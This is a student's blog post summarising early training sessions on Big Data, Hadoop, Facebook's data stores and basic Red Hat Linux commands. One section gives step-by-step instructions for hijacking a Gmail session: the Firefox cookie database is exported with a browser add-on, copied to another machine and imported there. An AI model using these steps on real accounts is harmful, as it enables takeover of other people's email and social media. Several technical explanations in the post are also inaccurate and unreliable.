Pawar Suvarna
In September 2020, training started on many technologies and real, industry-based requirements under the guidance of Mr. #Vimal Daga sir. In just two days I learned a huge amount. This platform is really good for anyone who wants to learn new technology.
Introduction to Big Data and the different techniques employed to handle it such as Hadoop.
About 2.5 quintillion bytes of data are generated every day, and this number is projected to keep increasing in the coming years (90% of the data stored today was produced within the last two years).
Big Data is the name of a problem in technology: the problem of handling a very large and fast-growing amount of data.
What makes Big Data different from any other large amount of data stored in relational databases is its heterogeneity. The data comes from different sources and has been recorded using different formats.
Three different ways of formatting data are commonly employed:
- Unstructured = unorganised data (e.g. videos).
- Semi-structured = the data is organised, but not in a fixed format (e.g. JSON).
- Structured = the data is stored in a fixed, structured format (e.g. RDBMS).
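The three formats can be illustrated with a small Python sketch. The sample records, names and values are made up for illustration only; CSV stands in for an RDBMS table.

```python
import csv
import io
import json

# Structured: fixed columns, like rows in an RDBMS table (CSV used as a stand-in).
structured = io.StringIO("id,name,salary\n1,Asha,52000\n2,Ravi,48000\n")
rows = list(csv.DictReader(structured))

# Semi-structured: self-describing keys, but records need not share the same fields.
semi_structured = json.loads(
    '[{"id": 1, "name": "Asha", "tags": ["admin"]},'
    ' {"id": 2, "email": "ravi@example.com"}]'
)

# Unstructured: raw bytes with no schema (a video or image file looks like this).
unstructured = bytes([0x00, 0x01, 0xFF, 0x10])


def field_names(records):
    """Return the sorted field names used by each record."""
    return [sorted(record.keys()) for record in records]


print(field_names(rows))             # every row has the same columns
print(field_names(semi_structured))  # fields differ from record to record
print(len(unstructured), "raw bytes")
```

The structured rows all share one schema, the JSON records each carry their own keys, and the byte string has no fields at all.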
Big Data is defined by three properties:
- Volume = because of the large amount of data, storing data on a single machine is impossible. How can we process data across multiple machines assuring fault tolerance?
- Variety = How can we deal with data coming from varied sources which have been formatted using different schemas?
- Velocity = How can we quickly store and process new data?
Big Data can be analysed using two different processing techniques:
- Batch processing = usually used if we are concerned with the volume and variety of our data. We first store all the needed data and then process it in one go (this can lead to high latency). A common application example is calculating monthly payroll summaries.
- Stream processing = usually employed if we are interested in fast response times. We process our data as soon as it is received (low latency). An application example is determining whether a bank transaction is fraudulent or not.
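The difference between the two techniques can be sketched in a few lines of Python. This is only a toy illustration: the payment amounts and the "flag anything above a limit" rule are assumptions, not a real fraud check.

```python
from typing import Iterable, Iterator


def batch_total(transactions: list[float]) -> float:
    """Batch: all data is stored first, then processed in one go."""
    return sum(transactions)


def stream_flags(
    transactions: Iterable[float], limit: float
) -> Iterator[tuple[float, bool]]:
    """Stream: each record is handled as soon as it arrives."""
    for amount in transactions:
        # Hypothetical rule: flag any amount above the limit.
        yield amount, amount > limit


payments = [120.0, 80.0, 9500.0, 40.0]

# Batch: one answer after everything has been collected.
print(batch_total(payments))

# Stream: one decision per record, without waiting for the rest.
for amount, suspicious in stream_flags(iter(payments), limit=5000.0):
    print(amount, "suspicious" if suspicious else "ok")
```

The batch function needs the whole list before it can answer, while the generator gives a result for each payment immediately.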
Big Data can be processed using different tools such as MapReduce, Spark, Hadoop, Pig, Hive, Cassandra and Kafka. Each of these tools has its own advantages and disadvantages, which determine how companies decide to employ them.
How does Facebook handle the 4+ petabytes of data generated per day? Cambridge Analytica - Facebook data scandal.
Before moving on to Facebook, let's take a look at a few points on why data is indeed considered the new gold!
- Google gets over 3.5 billion searches daily.
- Google holds the largest share of the search engine market, with 87.35% of the global market as of January 2020. Big Data stats for 2020 show that this translates into 1.2 trillion searches yearly, and more than 40,000 search queries per second.
- WhatsApp users exchange up to 65 billion messages daily.
- 5 million businesses are actively using the WhatsApp Business app to connect with their customers. There are over 1 billion WhatsApp groups worldwide.
- Internet users generate about 2.5 quintillion bytes of data each day.
- With the estimated amount of data we should have by 2020 (40 zettabytes), we have to ask ourselves what’s our part in creating all that data. So, how much data is generated every day? 2.5 quintillion bytes. Now, this number seems rather high, but if we look at it in zettabytes, i.e., 0.0025 zettabytes this doesn’t seem all that much. When we add to that the fact that in 2020 we should have 40 zettabytes, we’re generating data at a regular pace.
- By 2020, every person will generate 1.7 megabytes of data every second.
- In 2019, there were 2.3 billion active Facebook users, and they generate a lot of data.
How big is this data generated by Facebook?
Facebook generates 4 petabytes of data per day, which is 4 million gigabytes. All that data is stored in what is known as the Hive, which contains about 300 petabytes of data. This enormous amount of content generation is without a doubt connected to the fact that Facebook users spend more time on the site than users spend on any other social network, putting in about an hour a day.
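The unit conversions behind the figures quoted so far can be checked with a short Python sketch. It assumes decimal (SI) units, where each step up is a factor of 1000.

```python
# Decimal (SI) units: each step up is a factor of 1000.
GB = 10**9
PB = 10**15
ZB = 10**21


def convert(n_bytes: int, unit: int) -> float:
    """Express a byte count in the given unit."""
    return n_bytes / unit


daily_world_bytes = 25 * 10**17   # 2.5 quintillion bytes per day
daily_facebook_bytes = 4 * PB     # 4 petabytes per day

print(convert(daily_world_bytes, ZB))     # zettabytes per day
print(convert(daily_facebook_bytes, GB))  # gigabytes per day
```

With these units, 2.5 quintillion bytes is 0.0025 zettabytes and 4 petabytes is 4,000,000 gigabytes.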
Facebook Big data challenges
Big data stores are the workhorses for data analysis at Facebook. They grow by millions of events (inserts) per second and process tens of petabytes and hundreds of thousands of queries per day. The three data stores used most heavily are:
1. ODS (Operational Data Store) stores 2 billion time series of counters. It is used most commonly in alerts and dashboards and for trouble-shooting system metrics with 1–5 minutes of time lag. There are about 40,000 queries per second.
2. Scuba is Facebook’s fast slice-and-dice data store. It stores thousands of tables in about 100 terabytes in memory. It ingests millions of new rows per second and deletes just as many. Throughput peaks around 100 queries per second, scanning 100 billion rows per second, with most response times under 1 second.
3. Hive is Facebook’s data warehouse, with 300 petabytes of data in 800,000 tables. Facebook generates 4 new petabytes of data and runs 600,000 queries and 1 million map-reduce jobs per day. Presto, HiveQL, Hadoop, and Giraph are the common query engines over Hive.
ODS, Scuba, and Hive share an important characteristic: none is a traditional relational database. They process data for analysis, not to serve users, so they do not need ACID guarantees for data storage or retrieval. Instead, challenges arise from high data insertion rates and massive data quantities.
Big data Analytics
Big data analytics is the often complex process of examining big data to uncover information — such as hidden patterns, correlations, market trends and customer preferences — that can help organizations make informed business decisions.
On a broad scale, data analytics technologies and techniques provide a means to analyze data sets and take away new information — which can help organizations make informed business decisions. Business intelligence (BI) queries answer basic questions about business operations and performance.
Why is it so important in any business?
Big data analytics through specialized systems and software can lead to positive business-related outcomes:
- New revenue opportunities
- More effective marketing
- Better customer service
- Improved operational efficiency
- Competitive advantages over rivals
Big data analytics applications allow data analysts, data scientists, predictive modelers, statisticians and other analytics professionals to analyze growing volumes of structured transaction data, plus other forms of data that are often left untapped by conventional BI and analytics programs.
How Big Data is Changing our World
Big Data has made a big impact on our world. Some of our most popular posts in our Top 50 Big Data list illuminate how Big Data is changing the way business is run as well as advancing new technology.
To solve this problem, a technique called "distributed storage" is used. In distributed storage the data is divided into small chunks (stripes) and sent to slave nodes, following a master-slave model. The technology that implements this idea is "Hadoop".
1. Editor’s pick: Big Data Industries: 5 Industries Being Reshaped by Data Analytics
Did you know that farmers are leveraging data analytics? See the other traditional industries where Big Data is making an impact.
2. Actually, It’s More than Actuarials: Big Data for Insurance
3. Big Data vs. Market Research: Which Can Increase Your Business Intelligence?
4. Big Data Meets the Little Drone
6. How Big Data is Transforming the World of Finance
Hadoop is a set of open source programs written in Java which can be used to perform operations on a large amount of data. Hadoop is a scalable, distributed and fault-tolerant ecosystem. The main components of Hadoop are:
- Hadoop YARN = manages and schedules the resources of the system, dividing the workload across a cluster of machines.
- Hadoop Distributed File System (HDFS) = is a clustered file storage system which is designed to be fault-tolerant and to offer high throughput and high bandwidth. It is additionally able to store any type of data in any possible format.
- Hadoop MapReduce = is the processing layer: a map step turns the input records into key-value pairs and a reduce step aggregates them, which is how data is loaded, formatted and analysed quantitatively across the cluster.
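The MapReduce idea can be sketched with a word count in plain Python. This is a single-machine illustration of the map, shuffle and reduce steps, not Hadoop's actual Java API; the function names and sample lines are assumptions.

```python
from collections import defaultdict


def map_phase(line: str):
    """Map: emit a (word, 1) pair for every word in a line."""
    for word in line.lower().split():
        yield word, 1


def shuffle(pairs):
    """Shuffle: group all values that share the same key."""
    groups = defaultdict(list)
    for key, value in pairs:
        groups[key].append(value)
    return groups


def reduce_phase(groups):
    """Reduce: combine the values of each key into one result."""
    return {key: sum(values) for key, values in groups.items()}


lines = ["big data is big", "hadoop stores big data"]
pairs = [pair for line in lines for pair in map_phase(line)]
counts = reduce_phase(shuffle(pairs))
print(counts)
```

On a real cluster the map calls run on many machines at once and the shuffle moves data over the network, but the three steps are the same.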
Some application examples of Hadoop are: search (eg. Yahoo), log processing/Data warehouse (eg. Facebook) and Video/Image Analysis (eg. New York Times).
Hadoop was the first system to make MapReduce available on a large scale, although Apache Spark is nowadays the framework preferred by many companies thanks to its greater execution speed.
A Day In The Life Of A Hadoop Administrator
The life of a Hadoop Administrator revolves around creating, managing and monitoring the Hadoop Cluster. However, cluster administration is not practiced in the same way by administrators around the globe. The main variable is the "distribution of Hadoop", which determines the cluster monitoring tools you choose. The different distributions of Hadoop are Cloudera, Hortonworks, Apache and MapR. The Apache distribution is of course the open source Hadoop distribution.
As an administrator, if I want to set up a Hadoop cluster on the Hortonworks/Cloudera distribution, my job will be simple because all the configuration files will be present on startup. However, in the case of the open source Apache distribution of Hadoop, we have to manually set up all the configurations such as Core-Site, HDFS-Site, YARN-Site and MapRed-Site.
Once we have created the cluster, we have to ensure that the cluster is active and available at all times. For this, all the nodes in the cluster have to be set up. They are the NameNode, DataNode, Active & Standby NameNode, Resource Manager and Node Manager.
NameNode is the Heart of the cluster. It consists of Metadata, which helps the cluster to recognize the data and coordinate all the activities. Since a lot depends on the NameNode, we have to ensure 100% reliability and for this, we have something called the Standby NameNode which acts as the backup for the Active NameNode. NameNode stores the Metadata, while the actual data is stored in the DataNode in the form of Blocks. The Resource Manager takes care of the cluster’s CPU and memory resources at all times for all the Jobs while the Application Master manages the actual jobs.
If all the above services are running and are active at all times, your Hadoop Cluster is ready for use.
When setting up the Hadoop Cluster, the administrator will also need to decide the cluster size based on the amount of data that is to be stored in the HDFS. Since the replication factor of HDFS is 3, 15 TB of free space is required to store 5 TB of data in the Hadoop cluster. The replication factor is set at 3 in order to increase the Redundancy and Reliability. Cluster growth based on storage capacity is a very effective technique that is implemented in the clusters. We can add new systems to the existing cluster and thereby increase the storage space any number of times.
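The sizing arithmetic above can be written as a small Python sketch. The function names are hypothetical, and the calculation ignores any extra space a real cluster needs for temporary files or growth.

```python
def raw_capacity_needed(data_tb: float, replication_factor: int = 3) -> float:
    """Raw disk space needed when every block is stored replication_factor times."""
    return data_tb * replication_factor


def usable_capacity(raw_tb: float, replication_factor: int = 3) -> float:
    """Amount of data that fits into the given raw disk space."""
    return raw_tb / replication_factor


print(raw_capacity_needed(5))   # TB of raw space for 5 TB of data
print(usable_capacity(15))      # TB of data that fit into 15 TB of raw space
```

With the replication factor of 3, storing 5 TB takes 15 TB of raw space, and adding more machines raises the raw figure that the second function divides.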
Another important activity for a Hadoop Administrator is monitoring the cluster on a regular basis. We monitor the cluster to ensure that it is up and running at all times and to keep track of its performance. Clusters can be monitored using various cluster monitoring tools. We choose the appropriate tools based on the distribution of Hadoop that we are using.
The monitoring tools for the appropriate distribution of Hadoop are:
Open Source Hadoop/Apache Hadoop → Nagios / Ganglia / Ambari / Shell scripting / Python scripting
Cloudera Hadoop → Cloudera Manager + Open Source Hadoop tools
Hortonworks → Apache Ambari + Open Source Hadoop tools
Important topics learned in only two days:
1. To install any software on our laptop, we require an operating system.
2. Three things are very important: 'CPU', 'RAM' and 'H.D' (hard disk).
3. A limitation of a PC/laptop's HD/CPU/RAM is that it can boot only one OS at a time, but a technique called "virtualization" gets around this.
4. To install any OS we require an OS image.
5. We also learned in detail how to install Red Hat 8 in VirtualBox.
6. An ISO image of Red Hat 8 has to be downloaded for the installation.
7. We also learned about the CLI (Command Line Interface) and the GUI (Graphical User Interface).
8. In Red Hat 8 we learned that the "which" command shows the location of a command's executable file.
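The same kind of lookup that "which" performs can be tried from Python with the standard library function shutil.which, which searches the directories listed in PATH. The helper name locate and the command names below are only examples.

```python
import shutil


def locate(command: str) -> str:
    """Return the full path of a command, or a message if it is not on PATH."""
    path = shutil.which(command)
    return path if path is not None else f"{command}: not found on PATH"


print(locate("python3"))
print(locate("definitely-not-a-real-command"))
```

The output for the first call depends on the machine, because it is the path where that system keeps the executable.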
#Wow topic of the day: how a Gmail account can be opened without knowing the username and password.
- The cookie is the most important part of this topic.
- To read the data in a cookie file we need to know about the SQLite database.
- Every language is optimized for a certain idea, and every software/program is installed on an operating system.
- Data in use is stored in RAM, i.e. memory.
- RAM and CPU together are termed the compute unit.
- To store persistent (permanent) data, the hard disk is the storage unit.
- The limitation of RAM/CPU/H.D is that we can boot only one operating system at a time.
- Here virtualization comes into play: with it we can launch multiple operating systems.
- Booting starts the O.S., and for booting we need RAM and CPU.
- To install the Red Hat operating system, the minimum requirement is an image of the O.S.
- The RHEL instance created is known as a virtual machine or guest operating system.
- A program mainly has two interfaces:
1. GUI (Graphical User Interface)
2. CLI (Command Line Interface)
Step 1
cd $HOME/.mozilla : here I am using the cd command, which stands for "change directory", to go inside a folder or directory.
Step 2
ls : this command lists the folders we have in that particular directory.
Step 3
cd /firefox : now I am going to the Firefox folder.
Step 4
ls : to list the folders inside the Firefox folder.
Step 5
cd /default profile : to go inside the default profile folder.
Step 6
ls : this shows us the cookies file, which is stored as an SQLite database.
7. Add-ons concept : to convert the cookie SQLite file into normal text we have to use an add-on. We are using the cookie bro cookie manager add-on. One thing to remember is that a cookie is very critical. cookie bro helps us export a JSON file, so we can read the cookie and crack the Gmail or Facebook raw data and copy it into a text file; in my case I am copying it into cookiefile.txt .
Note : ifconfig : this command shows the IP of the system. scp IP 1:cookiefile.txt IP2:newcookiefile.txt~ : we are using the scp command to transfer the data from one VM to the other. Then in the other VM we can open Firefox, import the file as newcookiefile.txt in the add-on, and easily crack the Gmail.
#Learning points:
- A program is nothing but code.
- We cannot store data without a file.
- The OS gives two interfaces, GUI and CLI. Using the CLI we can interact with the operating system.
- The command prompt can run one program at a time.
- Ctrl+C is used to terminate a program and Ctrl+Z is used to pause it.
- The jobs command shows which programs are running or stopped in the terminal.
- The fg command is used to resume a paused program.
- mkdir is used to create a new directory, and ls is used to check whether the directory was created and to list files.
- The useradd command is used to create a new account.
- Ctrl+Alt+F3 is used to switch to another terminal and log in there.
- vi is an editor. In vi, 'i' opens insert mode, :w saves the file and :q exits it.
- In vi, y is used to copy (yank) text and p is used to paste it.
- In the Red Hat 8 terminal, whatever we type into an open program is stored only in RAM, not on the hard disk.
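Creating a directory and then listing files to check that it exists can also be tried from Python. This sketch uses pathlib in a temporary folder, so nothing is left behind; the folder name notes and the helper name are made up for the example.

```python
import tempfile
from pathlib import Path


def make_and_list(parent: Path, name: str) -> list[str]:
    """Create a directory (like mkdir) and return the parent's entries (like ls)."""
    (parent / name).mkdir(exist_ok=True)
    return sorted(entry.name for entry in parent.iterdir())


# Work inside a temporary directory that is deleted automatically afterwards.
with tempfile.TemporaryDirectory() as tmp:
    print(make_and_list(Path(tmp), "notes"))
```

If the new name appears in the returned list, the directory was created.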
#Wow_topic: BigData. It is the name of a problem in technology. Under big data, volume and velocity are the big issues, and a technology came up to solve them: #"Distributed Storage".
#Hadoop is the software used to implement this technology.
#A real-time application of this is storing social media information.
One of the reasons the big companies can run their business is data.
Every day Facebook receives a big amount of data, approx. 500 TB/day.
What is big data?
BIG DATA is not at all a technology. It is the name of the PROBLEM that we face in the data world.
Some sub-problems of big data:
VOLUME : capacity to store, i.e. size
VELOCITY : speed of I/O operations
One TECHNOLOGY/CONCEPT that came up to solve at least these two problems is DISTRIBUTED STORAGE. It is at the core of the issues related to the big data world.
Difference between the resources that a COMPANY USES and those that we GENERALLY USE:
* In company usage, the resources are reliable. The ones we generally use are not: if the hard disk crashes, the data is lost.
* For the same size of HD the cost is different. For company usage it is costly; for general usage it is cheap.
* The machines companies use are typically called SERVERS. The ones that we use are called COMMODITY HARDWARE.
A detailed study of the distributed storage concept: how it works and how it solves the VOLUME, VELOCITY and COST problems of big data.
DISTRIBUTED STORAGE is the name of the CONCEPT. To IMPLEMENT any concept we need a PRODUCT/SOFTWARE. One of the core software products that companies use is HADOOP.
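The distributed storage concept can be sketched in Python: the data is cut into fixed-size blocks and a master records which slave node holds which block. The node names, the tiny block size and the round-robin placement are assumptions for illustration; Hadoop's real placement and replication logic is more involved.

```python
def split_into_blocks(data: bytes, block_size: int) -> list[bytes]:
    """Cut the data into fixed-size blocks (the last one may be smaller)."""
    return [data[i:i + block_size] for i in range(0, len(data), block_size)]


def assign_blocks(blocks: list[bytes], nodes: list[str]) -> dict[str, list[int]]:
    """Master side: note which node stores which block index (round-robin)."""
    placement: dict[str, list[int]] = {node: [] for node in nodes}
    for index, _ in enumerate(blocks):
        placement[nodes[index % len(nodes)]].append(index)
    return placement


data = b"x" * 10
blocks = split_into_blocks(data, block_size=4)
placement = assign_blocks(blocks, ["node-1", "node-2", "node-3"])

print([len(block) for block in blocks])
print(placement)
```

Because each node stores only part of the data, the total capacity grows with the number of nodes (volume) and the blocks can be written and read in parallel (velocity).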
Some practical pictures:
The following figure shows the structure of VirtualBox. In VirtualBox we can install many operating systems, and we can also run multiple operating systems at the same time.
The figure above shows a terminal (CLI), which is used to interact with the operating system.
The figure above shows the basic commands of Red Hat 8 Linux.
The figure above shows the variation of RAM: when a file has no data, the RAM used is low, but when we enter some data in the file, the RAM used increases.
The figure above shows how to create a new directory, how to see the list of files, and how to check whether the directory was created.
The figure shows that when we press Ctrl+Z the program is not terminated but paused. When we pause the program and go to the next CLI prompt, the jobs command shows which programs are running or stopped. The program is resumed using the fg command. The "+" sign indicates priority: the program marked with "+" runs first, and then the next program runs.
The figure above shows the last command, which is used to see the code of Red Hat 8 Linux; for this reason it is also called an open source operating system.
So that's everything I learned in only two days. I am really excited for the future classes. Thank you so much, Mr. #Vimal Daga sir.
#bigdata #hadoop #bigdatamanagement #arthbylw #vimaldaga #righteducation #educationredefine #rightmentor #worldrecordholder #ARTH #linuxworld #makingindiafutureready #righeudcation